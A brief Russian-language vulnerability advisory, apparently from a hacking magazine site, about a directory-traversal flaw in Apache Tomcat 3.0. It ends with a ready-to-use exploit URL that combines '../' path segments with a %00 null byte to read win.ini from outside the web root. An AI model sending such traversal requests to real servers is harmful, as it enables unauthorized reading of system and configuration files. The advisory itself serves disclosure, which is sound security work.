Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Tomcat - это проект Apache
Software Foundation. Tomcat соединил в себе JSP 1.1 и Servlets 2.2.
Уязвимость в продукте позволяет получить доступ к файлам расположенным
вне рут директории.
Системы уязвимы:
Tomcat version 3.0
Эксплоит:
В качестве ответа на запрос по этому урлу придет содержимое файла win.ini:
http://www.example.com:8080/../../winnt/win.ini%00examples/jsp/hello.jsp